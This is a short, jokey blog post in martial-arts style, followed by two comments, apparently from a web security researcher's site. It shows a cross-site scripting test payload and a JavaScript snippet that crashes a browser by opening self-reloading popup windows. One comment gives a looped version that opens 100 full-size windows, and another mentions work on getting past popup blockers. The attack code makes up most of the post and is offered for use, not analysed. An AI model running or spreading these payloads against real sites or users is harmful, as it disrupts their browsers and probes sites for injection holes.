WebFu crouching tab hidden dos

Crouching tiger hidden dragon

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-

"><script>alert(/XSS PUNCH!/)</script>

Then you can respond with the crouching tab hidden dos move:-

self.location = "javascript:window.open('javascript:document.clear();
document.open();document.close();self.location=self.location')";

This move can frustrate your opponent into submission.

2 Responses to “WebFu crouching tab hidden dos”

  1. Gareth Heyes writes:

    for(i=0;i<100;i++) {
    self.location = “javascript:window.open(‘javascript:document.clear();document.open();document.close();self.location=self.location;’,”,’width=2000,height=2000′)”;
    }

  2. Gareth Heyes writes:

    Please note this technique requires the popup blocker to be disabled, I’m currently working on a technique to bypass that.